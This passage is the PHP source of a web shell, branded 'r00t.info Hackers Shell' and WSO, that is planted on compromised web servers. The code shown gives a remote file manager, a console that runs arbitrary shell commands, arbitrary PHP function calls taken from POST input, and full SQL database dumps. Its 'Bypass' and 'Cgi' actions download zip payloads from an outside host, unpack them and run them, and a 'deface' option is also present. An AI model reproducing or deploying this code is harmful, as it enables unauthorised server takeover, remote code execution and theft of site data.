opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) copy_paste(\$_SESSION['cwd'],\$f, \$GLOBALS['cwd']);\r\n } elseif(\$_SESSION['act'] == 'move') { function move_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) @rename(\$_SESSION['cwd'].\$f, \$GLOBALS['cwd'].\$f);\r\n } unset(\$_SESSION['f']);\r\n break;\r\n default: if(!empty(\$_POST['p1']) && ((\$_POST['p1'] == 'copy')||(\$_POST['p1'] == 'move')) ) { \$_SESSION['act'] = @\$_POST['p1'];\r\n \$_SESSION['f'] = @\$_POST['f'];\r\n foreach(\$_SESSION['f'] as \$k => \$f) \$_SESSION['f'][\$k] = urldecode(\$f);\r\n \$_SESSION['cwd'] = @\$_POST['c'];\r\n } break;\r\n } echo '<script>document.mf.p1.value=\"\";\r\ndocument.mf.p2.value=\"\";\r\n</script>';\r\n } \$dirContent = @scandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\n if(\$dirContent === false) { echo 'Can\\'t open this folder!';\r\n return;\r\n } global \$sort;\r\n \$sort = array('name', 1);\r\n if(!empty(\$_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match)) \$sort = array(\$match[1], (int)\$match[2]);\r\n } echo '<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\'checkbox\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\'100%\\' class=\\'main\\' cellspacing=\\'0\\' cellpadding=\\'2\\'>\r\n <form name=files method=post>';\r\n echo \"<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n \$dirs = \$files = \$links = array();\r\n \$n = count(\$dirContent);\r\n for(\$i=0;\r\n\$i<\$n;\r\n\$i++) { \$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n \$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n \$tmp = array('name' => \$dirContent[\$i], 'path' => \$GLOBALS['cwd'].\$dirContent[\$i], 'modify' => @date('Y-m-d H:i:s',@filemtime(\$GLOBALS['cwd'].\$dirContent[\$i])), 'perms' => viewPermsColor(\$GLOBALS['cwd'].\$dirContent[\$i]), 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]), 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]), 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i]) );\r\n if(@is_file(\$GLOBALS['cwd'].\$dirContent[\$i])) \$files[] = array_merge(\$tmp, array('type' => 'file'));\r\n elseif(@is_link(\$GLOBALS['cwd'].\$dirContent[\$i])) \$links[] = array_merge(\$tmp, array('type' => 'link'));\r\n elseif(@is_dir(\$GLOBALS['cwd'].\$dirContent[\$i])&& (\$dirContent[\$i] != \".\")) \$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n } \$GLOBALS['sort'] = \$sort;\r\n function cmp(\$a, \$b) { if(\$GLOBALS['sort'][0] != 'size') return strcmp(\$a[\$GLOBALS['sort'][0]], \$b[\$GLOBALS['sort'][0]])*(\$GLOBALS['sort'][1]?1:-1);\r\n else return ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n } usort(\$files, \"cmp\");\r\n usort(\$dirs, \"cmp\");\r\n usort(\$links, \"cmp\");\r\n \$files = array_merge(\$dirs, \$links, \$files);\r\n \$l = 0;\r\n foreach(\$files as \$f) { echo '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\r\n\"><b>[ '.htmlspecialchars(\$f['name']).' ]</b>').'</a></td><td>'.((\$f['type']=='file')?viewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms'] .'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n \$l = \$l?0:1;\r\n } echo '<tr><td colspan=5>\r\n <input type=hidden name=a value=\\'FilesMan\\'>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <select name=\\'p1\\'><option value=\\'copy\\'>Copy</option><option value=\\'move\\'>Move</option><option value=\\'delete\\'>Delete</option>';\r\n if(!empty(\$_SESSION['act'])&&@count(\$_SESSION['f'])){echo '<option value=\\'paste\\'>Paste</option>';\r\n } echo '</select> \r\n<input type=\"submit\" value=\">>\"></td><td colspan=\"2\" align=\"right\" width=\"1\"><input name=\"def\" value=\"r00t.info shell\" disabled=\"disabled\"/> \r\n<input type=\"submit\" value=\"Add Deface Here\" disabled=\"disabled\"></td></tr>\r\n </form></table></div>';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));\r\n}} if(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strLen(\$p);\r\n\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));\r\n}return \$r;\r\n}} if(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n if(function_exists(\$_POST['p1'])) echo \$_POST['p1'](\$_POST['p2']);\r\n \$temp = \"document.getElementById('strOutput').style.display='';\r\ndocument.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<h1>String conversions</h1><div class=content>';\r\n \$stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );\r\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n'><select name='selectTool'>\";\r\n foreach(\$stringTools as \$k => \$v) echo \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\r\n echo \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>\".htmlspecialchars(@\$_POST['p2']).\"</textarea></form><pre class='ml1' style='\".(empty(\$_POST['p1'])?'display:none;\r\n':'').\"margin-top:5px' id='strOutput'>\";\r\n if(!empty(\$_POST['p1'])) { if(function_exists(\$_POST['p1'])) echo htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\r\n } echo\"</pre></div>\";\r\n printFooter();\r\n } function actionFilesTools() { if( isset(\$_POST['p1']) ) \$_POST['p1'] = urldecode(\$_POST['p1']);\r\n if(@\$_POST['p2']=='download') { if(is_file(\$_POST['p1']) && is_readable(\$_POST['p1'])) { ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment;\r\n filename=\".basename(\$_POST['p1']));\r\n if (function_exists(\"mime_content_type\")) { \$type = @mime_content_type(\$_POST['p1']);\r\n header(\"Content-Type: \".\$type);\r\n } \$fp = @fopen(\$_POST['p1'], \"r\");\r\n if(\$fp) { while(!@feof(\$fp)) echo @fread(\$fp, 1024);\r\n fclose(\$fp);\r\n } } elseif(is_dir(\$_POST['p1']) && is_readable(\$_POST['p1'])) { } exit;\r\n } if( @\$_POST['p2'] == 'mkfile' ) { if(!file_exists(\$_POST['p1'])) { \$fp = @fopen(\$_POST['p1'], 'w');\r\n if(\$fp) { \$_POST['p2'] = \"edit\";\r\n fclose(\$fp);\r\n } } } printHeader();\r\n echo '<h1>File tools</h1><div class=content>';\r\n if( !file_exists(@\$_POST['p1']) ) { echo 'File not exists';\r\n printFooter();\r\n return;\r\n } \$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n \$gid = @posix_getgrgid(@fileowner(\$_POST['p1']));\r\n echo '<span>Name:</span> '.htmlspecialchars(\$_POST['p1']).' <span>Size:</span> '.(is_file(\$_POST['p1'])?viewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\n echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\n if( empty(\$_POST['p2']) ) \$_POST['p2'] = 'view';\r\n if( is_file(\$_POST['p1']) ) \$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\r\n else \$m = array('Chmod', 'Rename', 'Touch');\r\n foreach(\$m as \$v) echo '<a href=# onclick=\"g(null,null,null,\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\n echo '<br><br>';\r\n switch(\$_POST['p2']) { case 'view': echo '<pre class=ml1>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</pre>';\r\n break;\r\n case 'highlight': if( is_readable(\$_POST['p1']) ) { echo '<div class=ml1 style=\"background-color: #e1e1e1;\r\ncolor:black;\r\n\">';\r\n \$code = highlight_file(\$_POST['p1'],true);\r\n echo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\r\n } break;\r\n case 'chmod': if( !empty(\$_POST['p3']) ) { \$perms = 0;\r\n for(\$i=strlen(\$_POST['p3'])-1;\r\n\$i>=0;\r\n--\$i) \$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\n if(!@chmod(\$_POST['p1'], \$perms)) echo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,null,null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'edit': if( !is_writable(\$_POST['p1'])) { echo 'File isn\\'t writeable';\r\n break;\r\n } if( !empty(\$_POST['p3']) ) { @file_put_contents(\$_POST['p1'],\$_POST['p3']);\r\n echo 'Saved!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.text.value);\r\nreturn false;\r\n\"><textarea name=text class=bigarea>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</textarea><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'hexdump': \$c = @file_get_contents(\$_POST['p1']);\r\n \$n = 0;\r\n \$h = array('00000000<br>','','');\r\n \$len = strlen(\$c);\r\n for (\$i=0;\r\n \$i<\$len;\r\n ++\$i) { \$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\n switch ( ord(\$c[\$i]) ) { case 0: \$h[2] .= ' ';\r\n break;\r\n case 9: \$h[2] .= ' ';\r\n break;\r\n case 10: \$h[2] .= ' ';\r\n break;\r\n case 13: \$h[2] .= ' ';\r\n break;\r\n default: \$h[2] .= \$c[\$i];\r\n break;\r\n } \$n++;\r\n if (\$n == 32) { \$n = 0;\r\n if (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';\r\n} \$h[1] .= '<br>';\r\n \$h[2] .= \"\\n\";\r\n } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\r\n\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.\$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\n break;\r\n case 'rename': if( !empty(\$_POST['p3']) ) { if(!@rename(\$_POST['p1'], \$_POST['p3'])) echo 'Can\\'t rename!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.name.value);\r\nreturn false;\r\n\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'touch': if( !empty(\$_POST['p3']) ) { \$time = strtotime(\$_POST['p3']);\r\n if(\$time) { if(@touch(\$_POST['p1'],\$time,\$time)) die('<script>g(null,null,null,null,\"\")</script>');\r\n else { echo 'Fail!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } } else echo 'Bad time format!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'mkfile': break;\r\n } echo '</div>';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists('cpanel/cpanel.php')){ \$dizin = 'https://byr00t.co/vb/cpanel.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cpanel\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cpanel.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cpanel/');\r\n if(file_exists('cpanel.zip')){ @unlink('cpanel.zip');\r\n } if(\$cikar){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cpanel/cpanel.php')){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionConsole() { if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n echo \"document.cf.cmd.value='';\r\n\\n\";\r\n \$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\r\n if(preg_match(\"!.*cd\\s+([^;\r\n]+)\$!\",\$_POST['p1'],\$match)) { if(@chdir(\$match[1])) { \$GLOBALS['cwd'] = @getcwd();\r\n echo \"document.mf.c.value='\".\$GLOBALS['cwd'].\"';\r\n\";\r\n } } echo \"document.cf.output.value+='\".\$temp.\"';\r\n\";\r\n echo \"document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n\";\r\n \$temp = ob_get_clean();\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array(\"\");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push(\"\");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>';\r\n echo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value==\\'clear\\'){document.cf.output.value=\\'\\';\r\ndocument.cf.cmd.value=\\'\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n\"><select name=alias>';\r\n foreach(\$GLOBALS['aliases'] as \$n => \$v) { if(\$v == '') { echo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\n continue;\r\n } echo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '</select><input type=button onclick=\"add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}\" value=\">>\"> <input type=checkbox name=ajax value=1 '.(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style=\"border-bottom:0;\r\n\" readonly>';\r\n if(!empty(\$_POST['p1'])) { echo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']));\r\n } echo '</textarea><input type=text name=cmd style=\"border-top:0;\r\nwidth:100%;\r\n\" onkeydown=\"kp(event);\r\n\">';\r\n echo '</form></div><script>document.cf.cmd.focus();\r\n</script>';\r\n printFooter();\r\n } function actionLogout() { unset(\$_SESSION[md5(\$_SERVER['HTTP_HOST'])]);\r\n echo '\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert(\"Logout Successful\")</script>\r\n <body bgcolor=#ffffff><center><img src=\"http://r00t.info/shell-dosyalar/logo.png\"></center>\r\n <H1><center><p style=\"color: #DF0101\" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src=\"http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100\" scrolling=\"no\" \r\nframeborder=\"0\" style=\"background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n\" allowtransparency=\"true\"></iframe></center>\r\n <H3><marquee scrollamount=\"5\" scrolldelay=\"50\" width=\"100%\"><p style=\"color: #DF0101\" >Wso shell</p></marquee></H3></body>';\r\n } function actionSelfRemove() { printHeader();\r\n if(\$_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed');\r\n else echo 'unlink error!';\r\n } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists('cgi/rot.cin')){ \$dizin = 'https://byr00t.co/vb/cgi.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cgi\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cgi.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cgi/');\r\n if(file_exists('cgi.zip')){ @unlink('cgi.zip');\r\n } if(\$cikar){ chmod('cgi/rot.cin', 0755);\r\n echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cgi/rot.cin')){ echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var \$type;\r\n var \$link;\r\n var \$res;\r\n function DbClass(\$type) { \$this->type = \$type;\r\n } function connect(\$host, \$user, \$pass, \$dbname){ switch(\$this->type) { case 'mysql': if( \$this->link = @mysql_connect(\$host,\$user,\$pass,true) ) return true;\r\n break;\r\n case 'pgsql': \$host = explode(':', \$host);\r\n if(!\$host[1]) \$host[1]=5432;\r\n if( \$this->link = @pg_connect(\"host={\$host[0]} port={\$host[1]} user=\$user password=\$pass dbname=\$dbname\") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb(\$db) { switch(\$this->type) { case 'mysql': if (@mysql_select_db(\$db))return true;\r\n break;\r\n } return false;\r\n } function query(\$str) { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_query(\$str);\r\n break;\r\n case 'pgsql': return \$this->res = @pg_query(\$this->link,\$str);\r\n break;\r\n } return false;\r\n } function fetch() { \$res = func_num_args()?func_get_arg(0):\$this->res;\r\n switch(\$this->type) { case 'mysql': return @mysql_fetch_assoc(\$res);\r\n break;\r\n case 'pgsql': return @pg_fetch_assoc(\$res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_list_dbs(\$this->link);\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"SELECT datname FROM pg_database\");\r\n break;\r\n } return false;\r\n } function listTables() { switch(\$this->type) { case 'mysql': return \$this->res = \$this->query('SHOW TABLES');\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'\");\r\n break;\r\n } return false;\r\n } function error() { switch(\$this->type) { case 'mysql': return @mysql_error(\$this->link);\r\n break;\r\n case 'pgsql': return @pg_last_error(\$this->link);\r\n break;\r\n } return false;\r\n } function setCharset(\$str) { switch(\$this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset(\$str, \$this->link);\r\n else \$this->query('SET CHARSET '.\$str);\r\n break;\r\n case 'mysql': return @pg_set_client_encoding(\$this->link, \$str);\r\n break;\r\n } return false;\r\n } function dump(\$table) { switch(\$this->type) { case 'mysql': \$res = \$this->query('SHOW CREATE TABLE `'.\$table.'`');\r\n \$create = mysql_fetch_array(\$res);\r\n echo \$create[1].\";\r\n\\n\\n\";\r\n \$this->query('SELECT * FROM `'.\$table.'`');\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".@mysql_real_escape_string(\$v).\"'\";\r\n \$columns[] = \"`\".\$k.\"`\";\r\n } echo 'INSERT INTO `'.\$table.'` ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n case 'pgsql': \$this->query('SELECT * FROM '.\$table);\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".addslashes(\$v).\"'\";\r\n \$columns[] = \$k;\r\n } echo 'INSERT INTO '.\$table.' ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n } return false;\r\n } };\r\n \$db = new DbClass(@\$_POST['type']);\r\n if(@\$_POST['p2']=='download') { ob_start(\"ob_gzhandler\", 4096);\r\n \$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base']);\r\n \$db->selectdb(\$_POST['sql_base']);\r\n header(\"Content-Disposition: attachment;\r\n filename=dump.sql\");\r\n header(\"Content-Type: text/plain\");\r\n foreach(\$_POST['tbl'] as \$v) \$db->dump(\$v);\r\n exit;\r\n } printHeader();\r\n echo '<h1>Sql browser</h1><div class=content>\r\n <form name=\"sf\" method=\"post\">\r\n <table cellpadding=\"2\" cellspacing=\"0\">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\'query\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <td>\r\n <select name=\\'type\\'>\r\n <option value=\"mysql\" '.(@\$_POST['type']=='mysql'?'selected':'').'>MySql</option>\r\n <option value=\"pgsql\" '.(@\$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value=\"'.(empty(\$_POST['sql_host'])?'localhost':htmlspecialchars(\$_POST['sql_host'])).'\"></td>\r\n <td><input type=text name=sql_login value=\"'.(empty(\$_POST['sql_login'])?'root':htmlspecialchars(\$_POST['sql_login'])).'\"></td>\r\n <td><input type=text name=sql_pass 